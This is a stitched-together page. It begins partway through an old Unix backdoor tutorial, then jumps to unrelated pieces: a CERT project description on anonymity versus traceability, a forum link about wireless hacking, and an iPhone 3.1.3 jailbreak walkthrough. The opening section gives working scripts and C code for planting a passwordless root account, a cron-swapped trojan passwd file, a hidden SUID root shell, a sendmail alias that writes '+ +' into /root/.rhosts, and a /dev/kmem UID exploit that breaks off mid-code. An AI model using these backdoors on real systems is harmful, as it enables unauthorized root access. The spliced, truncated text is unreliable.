set evilflag = (`grep eviluser /etc/passwd`)





if($#evilflag == 0) then # Is he there?



set linecount = `wc -l /etc/passwd`

cd # Do this at home.

cp /etc/passwd ./temppass # Safety first.

@ linecount[1] /= 2

@ linecount[1] += 1 # we only want 2 temp files

split -$linecount[1] ./temppass # passwd string optional

echo "EvilUser::0:0:Mr. Sinister:/home/sweet/home:/bin/csh" >> ./xaa

cat ./xab >> ./xaa

mv ./xaa /etc/passwd

chmod 644 /etc/passwd # or whatever it was beforehand

rm ./xa* ./temppass

echo Done...

else

endif



[7] Cron-based trojan II. This one was brought to my attention by our very own Mr. Zippy. For this, you need a copy of the

/etc/passwd file hidden somewhere. In this hidden passwd file (call it /var/spool/mail/.sneaky) we have but one entry, a root

account with a passwd of your choosing. We run a cronjob that will, every morning at 2:30am (or every other morning), save a

copy of the real /etc/passwd file, and install this trojan one as the real /etc/passwd file for one minute (synchronize swatches!).

Any normal user or process trying to login or access the /etc/passwd file would get an error, but one minute later, everything

would be ok. Add this line to root's crontab file:





29 2 * * * /bin/usr/sneakysneaky_passwd



make sure this exists:



#echo "root:1234567890123:0:0:Operator:/:/bin/csh" > /var/spool/mail/.sneaky



and this is the simple shell script:



#!/bin/csh

# Install trojan /etc/passwd file for one minute

# daemon9@netcom.com This e-mail address is being protected from spambots. You need JavaScript enabled to view it



cp /etc/passwd /etc/.temppass

cp /var/spool/mail/.sneaky /etc/passwd

sleep 60

mv /etc/.temppass /etc/passwd



[8] Compiled code trojan. Simple idea. Instead of a shell script, have some nice C code to obfuscate the effects. Here it is.

Make sure it runs as root. Name it something innocous. Hide it well.



/* A little trojan to create an SUID root shell, if the proper argument is

given. C code, rather than shell to hide obvious it's effects. */

/* daemon9@netcom.com This e-mail address is being protected from spambots. You need JavaScript enabled to view it */



#include



#define KEYWORD "industry3"

#define BUFFERSIZE 10



int main(argc, argv)

int argc;

char *argv[];{



int i=0;



if(argv[1]){ /* we've got an argument, is it the keyword? */



if(!(strcmp(KEYWORD,argv[1]))){



/* This is the trojan part. */

system("cp /bin/csh /bin/.swp121");

system("chown root /bin/.swp121");

system("chmod 4755 /bin/.swp121");

}

}

/* Put your possibly system specific trojan

messages here */

/* Let's look like we're doing something... */

printf("Sychronizing bitmap image records.");

/* system("ls -alR / >& /dev/null > /dev/null&"); */

for(;i<10;i++){

fprintf(stderr,".");

sleep(1);

}

printf("\nDone.\n");

return(0);

} /* End main */



[9] The sendmail aliases file. The sendmail aliases file allows for mail sent to a particular username to either expand to several

users, or perhaps pipe the output to a program. Most well known of these is the uudecode alias trojan. Simply add the line:



"decode: "|/usr/bin/uudecode"



to the /etc/aliases file. Usally, you would then create a uuencoded .rhosts file with the full pathname embedded.



#! /bin/csh



# Create our .rhosts file. Note this will output to stdout.



echo "+ +" > tmpfile

/usr/bin/uuencode tmpfile /root/.rhosts



Next telnet to the desired site, port 25. Simply fakemail to decode and use as the subject body, the uuencoded version of the

.rhosts file. For a one liner (not faked, however) do this:



%echo "+ +" | /usr/bin/uuencode /root/.rhosts | mail decode@target.com This e-mail address is being protected from spambots. You need JavaScript enabled to view it



You can be as creative as you wish in this case. You can setup an alias that, when mailed to, will run a program of your

choosing. Many of the previous scripts and methods can be employed here.







The Covert



[10] Trojan code in common programs. This is a rather sneaky method that is really only detectable by programs such tripwire.

The idea is simple: insert trojan code in the source of a commonly used program. Some of most useful programs to us in this

case are su, login and passwd because they already run SUID root, and need no permission modification. Below are some

general examples of what you would want to do, after obtaining the correct sourcecode for the particular flavor of UNIX you

are backdooring. (Note: This may not always be possible, as some UNIX vendors are not so generous with thier sourcecode.)

Since the code is very lengthy and different for many flavors, I will just include basic psuedo-code:



get input;

if input is special hardcoded flag, spawn evil trojan;

else if input is valid, continue;

else quit with error;

...



Not complex or difficult. Trojans of this nature can be done in less than 10 lines of additional code.







The Esoteric



[11] /dev/kmem exploit. It represents the virtual of the system. Since the kernel keeps it's parameters in memory, it is possible

to modify the memory of the machine to change the UID of your processes. To do so requires that /dev/kmem have read/write

permission. The following steps are executed: Open the /dev/kmem device, seek to your page in memory, overwrite the UID of

your current process, then spawn a csh, which will inherit this UID. The following program does just that.



/* If /kmem is is readable and writable, this program will change the user's

UID and GID to 0. */

/* This code originally appeared in "UNIX security: A practical tutorial"

with some modifications by daemon9@netcom.com This e-mail address is being protected from spambots. You need JavaScript enabled to view it */



#include

#include

#include

#include

#include

#include

#include



#define KEYWORD "nomenclature1"



struct user userpage;

long address(), userlocation;



int main(argc, argv, envp)

int argc;

char *argv[], *envp[];{



int count, fd;

Protocols for Anonymity and Traceability Tradeoffs

a PROJECT AT CERT INSTITUTE FOR "Protocols for Anonymity and Traceability Tradeoffs"





Problem Addressed
Existing Internet protocols were never engineered for today’s Internet, where the trustworthiness of users cannot be assumed and where high-stakes, mission-critical applications increasingly reside. Malicious users exploit the severe weakness in existing Internet protocols to achieve anonymity and use that anonymity as a safe haven from which to launch repeated attacks on their victims. Hence, service providers and other victims of cyber attack want and need traceability for accountability, redress, and deterrence. Unfortunately, our current track-and-trace capability is extremely limited by the existing protocol and infrastructure design and requires a major re-engineering effort from both technical and policy perspectives. This is discussed in an SEI special report sponsored by the U.S. State Department [1]. On the other hand, Internet users, both individuals and organizations, often want or need anonymity for a variety of legitimate reasons. The engineering challenge is to balance the apparently conflicting needs of privacy and security.
Research Approach
Traceability and anonymity are attributes that are central to the security and survivability of mission-critical systems. We believe that principled, fine-grained tradeoffs between traceability and anonymity are pivotal to the future viability of the Internet. However, such tradeoffs are rarely explicitly made, the current capability to make such tradeoffs is extremely limited, and the tradeoffs between these attributes have occurred on an ad hoc basis at best. The LEVANT (Levels of Anonymity and Traceability) project is developing the foundations for a disciplined engineering design of Internet protocols in the context of key policy issues. This will allow dynamic, fine-grained tradeoffs between traceability and anonymity to be made on the basis of specific mission requirements. We see this project as a first step toward the development of a discipline of Internet engineering, which would translate traditional design and engineering processes, such as thorough requirements gathering and attribute tradeoff analyses, into the unique context of the Internet environment and its associated security and survivability risks [2].

In any Internet transaction, trust ultimately depends not on IP addresses but on particular relationships among individuals and their roles within organizations and groups (which may be economic, political, educational, or social). Trust cannot be established while maintaining total anonymity of the actors involved. It goes without saying that there is a great need for privacy on the Internet, and it must be carefully guarded. However, trust and privacy tradeoffs are a normal part of human social, political, and economic interactions, and such tradeoffs are routinely resolved in a number of venues, for example in the marketplace. Consider the telephone system, in particular the caller identification (caller ID) feature, which displays the phone number, and often the name, associated with incoming calls. Caller ID is a feature for which many customers are willing to pay extra in return for the privacy benefits associated with having some idea of who’s calling before answering a call. However, callers are sometimes given the option of being anonymous (i.e., not identifiable by the caller ID feature) by default or on a call-by-call basis. To more fully protect their privacy, caller ID customers can choose to block all incoming calls from anonymous callers. The anonymous caller is notified of this fact by an automated message. For callers who pre-arrange with their phone companies to be anonymous by default, the only way to complete a call is to enter a key sequence to remove the anonymity for that particular call and to redial. Customers who achieve anonymity on a call-by-call basis (by entering a specific key sequence) can choose to redial without entering the key sequence that denotes anonymity. This choice is a form of negotiation between the caller and the intended recipient of the call, and it is a tradeoff between anonymity and trust that is supported by the technology of caller ID and the marketplace. There is no government mandate that all calls must be anonymous or that no calls may be anonymous. The individual caller chooses whether or not to relinquish anonymity (or some degree of privacy) in exchange for the perceived value of completing the call by increasing the degree of trust as perceived by the recipient.

One can envision next-generation Internet protocols supporting this kind of marketplace negotiation of trust versus privacy tradeoffs. For example, we are exploring the possibility of third-party certifying authorities that would serve as brokers of trust. These certifying authorities would provide mechanisms whereby packets would be cryptographically signed with very fine-grained authentication credentials of the sender. This is not the same as having an individual digitally sign a message, as a digitally signed message may be too coarse grained for a particular scenario and may reveal too much. Another capability might be the escrowing, by these certifying authorities, of complete identifying information for a specified period of time, to be revealed in the event that one or more of a user’s packets have been identified as participating in a confirmed attack.

We are investigating the fundamental concepts necessary to inform the design of Internet protocols that support dynamic, fine-grained tradeoffs between traceability and anonymity in a manner that satisfies the security, survivability, and anonymity (or privacy) requirements of the protocols’ users. Our goal is to provide an exemplar for the application of principled software and systems engineering practices in the unique context of the Internet. A key part of this process is our exploration of alternative designs for new Internet protocols that allow the originator and the recipient of an Internet transaction or service to negotiate what levels of traceability and anonymity to accept. In order to design and evaluate Internet protocols that support negotiated tradeoffs between anonymity and traceability, we need some way to quantify and measure levels of anonymity and traceability. The concept of k-anonymity provides some useful theoretical underpinnings.
Meaning of k-anonymity
We say that a user is k-anonymous in a network context if the user is only traceable to a set of measure k, where this could mean either a set of size k or a set of radius k in the topological sense of the network (as shown in Figure 1). Our goal is to explore the design of Internet protocols that assure traceability, but only to a group of k actors. The concept of k-anonymity was first defined by Pierangela Samarati [3]. Samarati showed how generalization and suppression of data can be used to enforce k-anonymity in private databases (such as those containing medical and driver’s license data) thereby reducing privacy loss. This concept was later reiterated by Latanya Sweeney in the context of medical databases [4].

Figure 1: Examples of k-anonymity

User and Service Provider Goals
Effective anonymity and traceability tradeoffs require an in-depth understanding of the specific goals of users and service providers. User goals may differ on a case-by-case basis. Below are some examples:

* User may want to hide its location and identity entirely (large k).
* User may want to hide its location somewhat (e.g., reveal the city, but not street address).
* User may want to hide its location but not its identity.

Similarly, service providers may have different goals and/or requirements. Below are some examples:

* Provider may want to know both user’s location and identity.
* Provider may want to know user’s location somewhat.
* Provider may want to know user’s identity but does not care about user’s location.

It is important to note that the value of anonymity and traceability tradeoffs extends well beyond the relationships among individual users and service providers. The ability to explicitly make such tradeoffs can provide essential support for organizations engaged in a complex mix of collaborative and competitive (adversarial) relationships. Consider the scenario below.
LEVANT Scenario
Assume that a number of organizations collaborate to build a shared (highly distributed) knowledge base that is more comprehensive and of higher quality than each could build on its own. This knowledge base provides a significant competitive advantage for the collaborators over other organizations that are not participating in this effort.

Although the participating organizations collaborate on some projects, they are competitors in other areas. Each may use the knowledge base to further its own strategies, tactical decisions, and so forth. Hence, each participating organization wants traceability in the event that the availability, integrity, or confidentially of the knowledge base is compromised or threatened, and to ensure that no external organizations get access to the data. Yet, each organization wants its own members to be able to query the knowledge base without revealing to the other collaborators (or, of course, to any outsider) the source of any query being made by that organization. LEVANT technology would provide network-level protocol support for the traceability and anonymity tradeoffs that the collaborating organizations agree upon, helping ensure the success of their cooperative and individual missions.

Some additional information on the LEVANT project is available in a summary report on SEI independent research and development projects [5].
Benefits
In this era of open, highly distributed, complex systems, vulnerabilities abound and adequate security, using defensive measures alone, can never be guaranteed. As with all other aspects of crime and conflict, deterrence plays an essential role in protecting society. Hence, the ability to track and trace attackers is crucial, because in an environment of total anonymity, deterrence is impossible, and an attacker can endlessly experiment with countless attack strategies and techniques until success is achieved. The ability to accurately and precisely assign responsibility for cyber attacks to entities or individuals (or to interrupt attacks in progress) would be of critical value. It would allow society’s legal, political, and economic mechanisms to work both domestically and internationally to deter future attacks and motivate evolutionary improvements in relevant laws, treaties, policies, and engineering technology. On the other hand, there are many legal, political, economic, and social contexts in which some protection of anonymity or privacy is essential. Without some degree of anonymity or privacy, individuals or entities whose cooperation is vitally needed may not fully participate (or participate at all) in the use or operation of systems that support the critical functions of the global information society.

Hence, traceability and anonymity are attributes that are central to the security and survivability of mission-critical systems. The LEVANT project is exploring the essential engineering and policy issues associated with traceability and anonymity tradeoffs. A primary objective is to design Internet protocols that allow these tradeoffs to be dynamic, fine grained, and based on the specific mission needs of the protocols’ users. An ultimate benefit of these new Internet protocols will be dramatically improved security and traceability for mission-critical applications and infrastructures, along with strong privacy and anonymity protection for legitimate users who act either as individuals or within specific organizational roles.
2006 Accomplishments
In FY2006, we continued our work towards establishing a solid theoretical foundation on which to base principled engineering tradeoffs between traceability and anonymity. Our research has explored the range of engineering requirements for the design of Internet protocols that support traceability and anonymity attribute tradeoffs and the negotiations that are needed to set the desired level of each attribute. We’ve generated and analyzed several LEVANT protocol scenarios of use that include specific user requirements for anonymity and traceability that must be satisfied for particular applications, systems, and missions. We’ve also investigated the underlying security and survivability themes in this research, in particular with respect to the engineering tradeoffs being explored for protocol design. Our research has also examined policy issues relating to the design and use of protocols that support negotiated levels of anonymity and traceability for individual actors and for organizations.
2007 Plans
In FY2007, we plan to complete an SEI technical report on our LEVANT project research. One or more papers derived from this technical report are also planned, along with the submission of funding proposals seeking long-term support for the LEVANT project.

a good link for wireless hacking

wireless hacking explain .... step by step.


http://www.cs.wright.edu/~pmateti/InternetSecurity/Lectures/WirelessHacks/Mateti-WirelessHacks.htm

Jailbreaking iPhone 3.1.3 IPSW with PwnageTool 3.1.5

Intipadi.com – With the PwnageTool app now updated for Mac OS X users, most of the iPhone Dev Team’s set of jailbreak and unlock tools now supports iPhone firmware 3.1.3, the latest update from Apple. Although Softpedia does not condone jailbreaking, those who do wish to employ these tools and hack their iPhones should at least follow a few guidelines, so they don’t brick their devices.

“If you really truly feel that you need to update, [PwnageTool 3.1.5] creates a custom 3.1.3 IPSW for you to restore to on your iPhone 2G, iPhone 3G, iPhone 3GS with early bootrom, iPod touch 1G, and iPod touch 2G with early bootrom,” the iPhone Dev Team says in its recent blog post.

“If you don’t know if you have an early bootrom or not, please avoid updating until you learn more [...] If you have an iPhone 3GS, PwnageTool works if you’re currently at version 3.1.2 or below (down to 3.0). [...] Don’t use PwnageTool on the iPhone 3GS if you’re at 3.1.3, it just won’t work (you will need to downgrade to 3.1.2).” “Also, if you use the blacksn0w unlock (currently at baseband 05.11.07), you will need to stay at 3.1.2,” according to the infamous team of hackers.

With that out of the way, the steps to follow should ensure the proper jailbreaking of a first-generation iPhone for firmware version 3.1.3. The steps are similar for the other devices supported by PwnageTool, with few differences. This guide doesn’t include instructions on how to unlock your device at 3.1.3. If you’re already unlocked, PwnageTool will preserve it for you as you restore using your custom firmware IPSW bundle (it doesn’t update the phone’s baseband). If you do plan to unlock after jailbreaking, you will need to ensure there’s a wireless Internet connection you can hook up to. PwnageTool only does the jailbreak part, and installs Cydia, which allows you to download BootNeuter, install it, and use it to unlock. Ok, let’s move on to the actual jailbreak steps.

1 – First off, users need to download their tools:
- PwnageTool 3.1.5;
- iPhone1,1_3.1.3_7E18_Restore.ipsw.
(Sorry, no download links for such files says our policy; Google is your friend here)

2 – Fire up PwnageTool and select your device (as noted above, this tutorial is good word for word only with first-gen iPhones).

3 – By default, PwnageTool will move forward in simple mode attempting to find that iPhone 3.1.3 firmware you were supposed to download, according to step 1. If it can’t find it, you will be asked to browse your computer’s hard drive and select it yourself. Make sure it is listed exactly as the one shown in the screenshot below.

4 – After hitting the right arrow to move on to the next phase, PwnageTool will ask you if you want to continue with the procedure. Hit “yes,” if you’re feeling confident that you want to jailbreak, or “no,” if you decide that buying everything fair and square from the iTunes store is your thing. By choosing “yes” you continue with the jailbreak process. PwnageTool will also ask you if you have an iPhone contract that would activate normally through iTunes, meaning you wouldn’t have to unlock as well, afterwards. If you don’t, or if you’re not sure, hit “no,” as instructed, and click the arrow.

Note: during this step, PwnageTool may also ask you to provide a couple of extra files (bootloaders), which it needs in order to complete the jailbreak process. If you don’t have them lying around, go looking for them on the Internet as instructed by the software. They’re pretty easy to find and all you need to do is download them to your desktop. PwnageTool will then recognize them automatically and continue with the jailbreak process.

5 – This step involves some waiting time. Just sit back and wait as PwnageTool creates your custom (jailbroken) IPSW restore file. During this step, the application will require you to type in your administrator password, if that’s how your computer is set up.

6 – Before showing the “success” screen, PwnageTool will have a couple more things to say to you, as shown below. For the first dialog, choose based on the knowledge of your previous actions. Do as instructed, according to the second.

7 – For this step, you need to connect your iPhone to your computer (using the USB cable it shipped with). Hit the right-arrow button again to finish, and then hit the DFU button above. You will be shown how to enter DFU mode. Pay great attention to the steps here, as they involve some timely actions. If you don’t succeed at first, don’t worry, you can retry entering DFU mode.


8 – This is the last step. If everything has gone right up to this point, you’re minutes away from having a jailbroken iPhone. Launch iTunes (which needs to be at least version 9.0) and allow it to recognize your device. If you’ve successfully completed step 7 (DFU mode), iTunes should pop up a dialog saying it has found a phone in recovery mode, advising you to restore it. Hit “ok.” You now need to restore to the custom firmware bundle created by PwnageTool and placed on your desktop. Hold ALT (option key) and click “restore” in iTunes. The application will prompt you to select the firmware bundle you want to restore to. In this case, it will be “iPhone1,1_3.1.3_7E18_Custom_Restore.ipsw.” Select it and continue.

At this point, your new custom firmware is being installed, so all you have to do is wait for it to complete the process and reboot your phone. Depending on a number of factors (system specs, etc.), this last step may take somewhere between four and six minutes.